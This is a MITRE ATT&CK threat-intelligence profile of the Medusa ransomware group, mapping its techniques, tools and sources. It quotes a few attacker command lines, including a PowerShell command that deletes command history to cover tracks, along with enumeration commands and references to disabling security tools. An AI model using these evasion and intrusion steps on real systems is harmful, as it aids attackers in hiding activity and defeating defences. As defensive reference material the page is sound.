Skip to content

G1051 Medusa Group

Medusa Group has been active since at least 2021 and was initially operated as a closed ransomware group before evolving into a Ransomware-as-a-Service (RaaS) operation. Some reporting indicates that certain attacks may still be conducted directly by the ransomware’s core developers. Public sources have also referred to the group as “Spearwing” or “Medusa Actors.” 1 3 Medusa Group employs living-off-the-land techniques, frequently leveraging publicly available tools and common remote management software to conduct operations. The group engages in double extortion tactics, exfiltrating data prior to encryption and threatening to publish stolen information if ransom demands are not met. 4 For initial access, Medusa Group has exploited publicly known vulnerabilities, conducted phishing campaigns, and used credentials or access purchased from Initial Access Brokers (IABs). The group is opportunistic and has targeted a wide range of sectors globally. 2

Item Value
ID G1051
Associated Names
Version 1.0
Created 15 October 2025
Last Modified 24 October 2025
Navigation Layer View In ATT&CK® Navigator

Techniques Used

Domain ID Name Use
enterprise T1548 Abuse Elevation Control Mechanism -
enterprise T1548.002 Bypass User Account Control Medusa Group has attempted to bypass UAC using Component Object Model (COM) interface.2
enterprise T1087 Account Discovery -
enterprise T1087.001 Local Account Medusa Group has leveraged net user for account discovery.3
enterprise T1650 Acquire Access Medusa Group has purchased user credentials and other sensitive data from Initial Access Brokers (IABs).5612
enterprise T1583 Acquire Infrastructure -
enterprise T1583.006 Web Services Medusa Group has utilized a file hosting service named filemail[.]com to host a zip file that contained malicious payloads that facilitated follow-on actions.5
enterprise T1071 Application Layer Protocol -
enterprise T1071.001 Web Protocols Medusa Group has communicated through reverse or bind shells over port 443 (HTTPS).1
enterprise T1059 Command and Scripting Interpreter -
enterprise T1059.001 PowerShell Medusa Group has leveraged PowerShell for execution and defense evasion.612 Medusa Group has also utilized PowerShell to execute a bitsadmin transfer from file hosting site.5
enterprise T1059.003 Windows Command Shell Medusa Group has used Windows Command Prompt to control and execute commands on the system to include ingress, network, and filesystem enumeration activities.1
enterprise T1136 Create Account -
enterprise T1136.002 Domain Account Medusa Group has created a domain account within the victim environment.1
enterprise T1543 Create or Modify System Process -
enterprise T1543.003 Windows Service Medusa Group has used vulnerable or signed drivers to modify security solutions on victim devices.1
enterprise T1486 Data Encrypted for Impact Medusa Group has encrypted files using AES-256 encryption which then appends the file extension “.medusa” to encrypted files and leaves a ransomware note named “!READ_ME_MEDUSA!!!.txt.”5134
enterprise T1652 Device Driver Discovery Medusa Group has queried drivers on the victim device through the command driverquery.1
enterprise T1573 Encrypted Channel -
enterprise T1573.002 Asymmetric Cryptography Medusa Group has used HTTPS for command and control.1
enterprise T1585 Establish Accounts -
enterprise T1585.001 Social Media Accounts Medusa Group has created social media accounts including Telegram and X to publicize their activities.56
enterprise T1585.002 Email Accounts Medusa Group has created email accounts used in ransomware negotiations.1
enterprise T1567 Exfiltration Over Web Service -
enterprise T1567.002 Exfiltration to Cloud Storage Medusa Group has utilized Rclone to exfiltrate data from victim environments to cloud storage.13
enterprise T1190 Exploit Public-Facing Application Medusa Group has leveraged public facing vulnerabilities in their campaigns against victim organizations to gain initial access.53 Medusa Group has also utilized CVE-2024-1709 in ScreenConnect, and CVE-2023-48788 in Fortinet EMS for initial access to victim environments.1
enterprise T1083 File and Directory Discovery Medusa Group has searched for files within the victim environment for encryption and exfiltration.514 Medusa Group has also identified files associated with remote management services.51
enterprise T1657 Financial Theft Medusa Group has stolen and encrypted victims’ data in order to extort victims into paying a ransom.561234
enterprise T1564 Hide Artifacts -
enterprise T1564.003 Hidden Window Medusa Group has utilized the ShowWindow API function to hide the current window.4
enterprise T1562 Impair Defenses -
enterprise T1562.001 Disable or Modify Tools Medusa Group has terminated antivirus services utilizing the gaze.exe executable and utilizing psexec.exe.513 Medusa Group has also leveraged I/O control codes (IOCTLs) for terminating and deleting processes of identified security tools.5
enterprise T1562.003 Impair Command History Logging Medusa Group has removed PowerShell command history through the use of the PSReadLine module by running the PowerShell command Remove-Item (Get-PSReadlineOption).HistorySavePath.1
enterprise T1562.004 Disable or Modify System Firewall Medusa Group has utilized PsExec to execute batch scripts that modify firewall settings.1 Medusa Group has also enabled and modified firewall rules to allow for RDP connections for lateral movement and device interactions.1
enterprise T1070 Indicator Removal -
enterprise T1070.003 Clear Command History Medusa Group has cleared command history by running the PowerShell command Remove-Item (Get-PSReadlineOption).HistorySavePath.1
enterprise T1070.004 File Deletion Medusa Group has deleted previously installed tools.1
enterprise T1105 Ingress Tool Transfer Medusa Group has leveraged certutil, PowerShell, and Windows Command to download additional tools to include RMM services.1 Medusa Group has also engaged in “Bring Your Own Vulnerable Driver” (BYOVD) and downloaded vulnerable or signed drivers to the victim environment to disable security tools.13
enterprise T1490 Inhibit System Recovery Medusa Group has deleted recovery files such as shadow copies using vssadmin.exe.5134
enterprise T1559 Inter-Process Communication -
enterprise T1559.001 Component Object Model Medusa Group has leveraged Component Object Model (COM) to bypass UAC.2
enterprise T1570 Lateral Tool Transfer Medusa Group has utilized legitimate software services such as PDQ Deploy to transfer malicious binaries and tools to other victimized hosts within the target environment.3
enterprise T1112 Modify Registry Medusa Group has modified Registry keys to elevate privileges, maintain persistence and allow remote access.1
enterprise T1106 Native API Medusa Group has leveraged Windows Native API functions to execute payloads.4
enterprise T1046 Network Service Discovery Medusa Group has the capability to use living off the land (LOTL) binaries to perform network enumeration.1 Medusa Group has also utilized the publicly available scanning tool SoftPerfect Network Scanner (netscan.exe) to discover device hostnames and network services.3
enterprise T1135 Network Share Discovery Medusa Group has identified network shares using cmd.exe /c net share.1
enterprise T1027 Obfuscated Files or Information -
enterprise T1027.002 Software Packing Medusa Group has packed the code of dropped kernel drivers using the packer ASM Guard.5
enterprise T1027.010 Command Obfuscation Medusa Group has obfuscated PowerShell scripts with Base64 encoding.1 Medusa Group has also obfuscated the code of dropped kernel drivers using a software known as Safengine Shielden which randomized the code through code mutations and then leveraged an embedded virtual machine interpreter to execute the code.5
enterprise T1588 Obtain Capabilities -
enterprise T1588.002 Tool Medusa Group has obtained and leveraged numerous RMM services, along with publicly available tools used for scanning.513 Medusa Group has utilized tools such as Advanced IP Scanner and SoftPerfect Network scanner for user, system and network discovery.1 Medusa Group has also acquired tools for command and control and defense evasion which include tunneling tools Ligolo and Cloudflared.1
enterprise T1003 OS Credential Dumping -
enterprise T1003.001 LSASS Memory Medusa Group has leveraged Mimikatz to dump LSASS to harvest credentials.1
enterprise T1003.003 NTDS Medusa Group has accessed the ntds.dit file to engage in credential dumping.3
enterprise T1069 Permission Groups Discovery -
enterprise T1069.002 Domain Groups Medusa Group has utilized the net group command to query domain groups within the victim environment.1
enterprise T1057 Process Discovery Medusa Group has utilized a hard-coded security tool process list that identifies and terminates using an undocumented IOCTL code 0x222094.5
enterprise T1090 Proxy -
enterprise T1090.003 Multi-hop Proxy Medusa Group has used TOR nodes for communications.563
enterprise T1219 Remote Access Tools Medusa Group has leveraged Remote Access Software for lateral movement and data exfiltration.5134 Medusa Group has also been known to utilize Remote Access Software such as AnyDesk, Atera, ConnectWise, eHorus, N-Able, PDQ Deploy, PDQ Inventory, SimpleHelp and Splashtop.1
enterprise T1021 Remote Services -
enterprise T1021.001 Remote Desktop Protocol Medusa Group has used RDP to conduct lateral movement and exfiltrate data.1 Medusa Group has also utilized the Windows executable mstsc.exe for RDP activities through the command mstsc.exe /v:{hostname/ip}.1
enterprise T1018 Remote System Discovery Medusa Group has used PDQ Inventory to get an inventory of the endpoints on the network.3
enterprise T1505 Server Software Component -
enterprise T1505.003 Web Shell Medusa Group has utilized webshells to an exploited Microsoft Exchange Server.5
enterprise T1489 Service Stop Medusa Group has terminated services related to backups, security, databases, communication, filesharing and websites.134
enterprise T1072 Software Deployment Tools Medusa Group has utilized software deployment and management solutions to deploy their encryption payload to include BigFix and PDQ Deploy.1
enterprise T1518 Software Discovery -
enterprise T1518.001 Security Software Discovery Medusa Group has detected security solutions for termination or deletion within the victim device using hard-coded lists of strings containing security product executables.5
enterprise T1608 Stage Capabilities -
enterprise T1608.002 Upload Tool Medusa Group has utilized a file hosting service called filemail[.]com to host a zip file that contained a RMM service such as ConnectWise.5
enterprise T1553 Subvert Trust Controls -
enterprise T1553.002 Code Signing Medusa Group has utilized vulnerable or signed drivers to kill or delete services associated with endpoint detection and response (EDR) tools.1
enterprise T1218 System Binary Proxy Execution -
enterprise T1218.014 MMC Medusa Group has leveraged Microsoft Management Console (MMC) to facilitate lateral movement and to interact locally or remotely with victim devices using the command mmc.exe compmgmt.msc /computer:{hostname/ip}.1
enterprise T1082 System Information Discovery Medusa Group has leveraged cmd.exe to identify system info cmd.exe /c systeminfo.1
enterprise T1016 System Network Configuration Discovery Medusa Group has obtained host network details utilizing the command cmd.exe /c ipconfig /all.1
enterprise T1033 System Owner/User Discovery Medusa Group has utilized PsExec to execute quser to discover the user session information.3
enterprise T1569 System Services -
enterprise T1569.002 Service Execution Medusa Group has utilized PsExec to execute scripts and commands within victim environments.513 Medusa Group has also used the Windows service RoboCopy to search and copy data for exfiltration.3
enterprise T1529 System Shutdown/Reboot Medusa Group has manually turned off and encrypted virtual machines.1
enterprise T1078 Valid Accounts Medusa Group has utilized compromised legitimate local and domain accounts within the victim environment to facilitate remote access and lateral movement sometimes in combination with PsExec.1
enterprise T1047 Windows Management Instrumentation Medusa Group has utilized Windows Management Instrumentation to query system information.512

Software

ID Name References Techniques
S0160 certutil Medusa Group has utilized certutil to download additional tools within victim environments.1 Archive via Utility:Archive Collected Data Deobfuscate/Decode Files or Information Ingress Tool Transfer Install Root Certificate:Subvert Trust Controls
S1244 Medusa Ransomware Medusa Group has used Medusa Ransomware for ransomware activities.5134 Windows Command Shell:Command and Scripting Interpreter PowerShell:Command and Scripting Interpreter Windows Service:Create or Modify System Process Data Encrypted for Impact Deobfuscate/Decode Files or Information File and Directory Discovery Hidden Window:Hide Artifacts Disable or Modify Tools:Impair Defenses File Deletion:Indicator Removal Inhibit System Recovery Inter-Process Communication Local Storage Discovery Native API Network Share Discovery Encrypted/Encoded File:Obfuscated Files or Information Process Discovery Selective Exclusion Service Stop Security Software Discovery:Software Discovery System Information Discovery System Service Discovery System Time Discovery
S0002 Mimikatz Medusa Group has used Mimikatz to dump LSASS for credential harvesting.1 SID-History Injection:Access Token Manipulation Account Manipulation Security Support Provider:Boot or Logon Autostart Execution Credentials from Password Stores Credentials from Web Browsers:Credentials from Password Stores Windows Credential Manager:Credentials from Password Stores DCSync:OS Credential Dumping Security Account Manager:OS Credential Dumping LSASS Memory:OS Credential Dumping LSA Secrets:OS Credential Dumping Rogue Domain Controller Steal or Forge Authentication Certificates Golden Ticket:Steal or Forge Kerberos Tickets Silver Ticket:Steal or Forge Kerberos Tickets Private Keys:Unsecured Credentials Pass the Hash:Use Alternate Authentication Material Pass the Ticket:Use Alternate Authentication Material
S0029 PsExec Medusa Group has utilized PsExec to facilitate execution, lateral movement, defense evasion, and exfiltration.1 Domain Account:Create Account Windows Service:Create or Modify System Process Lateral Tool Transfer SMB/Windows Admin Shares:Remote Services Service Execution:System Services
S1040 Rclone Medusa Group has leveraged Rclone to exfiltrate data from victim environments.13 Archive via Utility:Archive Collected Data Data Transfer Size Limits Exfiltration Over Asymmetric Encrypted Non-C2 Protocol:Exfiltration Over Alternative Protocol Exfiltration Over Unencrypted Non-C2 Protocol:Exfiltration Over Alternative Protocol Exfiltration to Cloud Storage:Exfiltration Over Web Service File and Directory Discovery

References

  1. Cybersecurity and Infrastructure Security Agency. (2025, March 12). AA25-071A #StopRansomware: Medusa Ransomware. Retrieved October 15, 2025. 

  2. Intel471. (2025, May 14). Threat hunting case study: Medusa ransomware. Retrieved October 15, 2025. 

  3. Threat Hunter Team Symantec and Carbon Black. (2025, March 6). Medusa Ransomware Activity Continues to Increase. Retrieved October 15, 2025. 

  4. Vlad Pasca. (2024, January 1). A Deep Dive into Medusa Ransomware. Retrieved October 15, 2025. 

  5. Anthony Galiette, Doel Santos. (2024, January 11). Medusa Ransomware Turning Your Files into Stone. Retrieved October 15, 2025. 

  6. Check Point. (2025, April 16). The 2025 Ransomware Surge: Context for Medusa’s Rise. Retrieved October 15, 2025.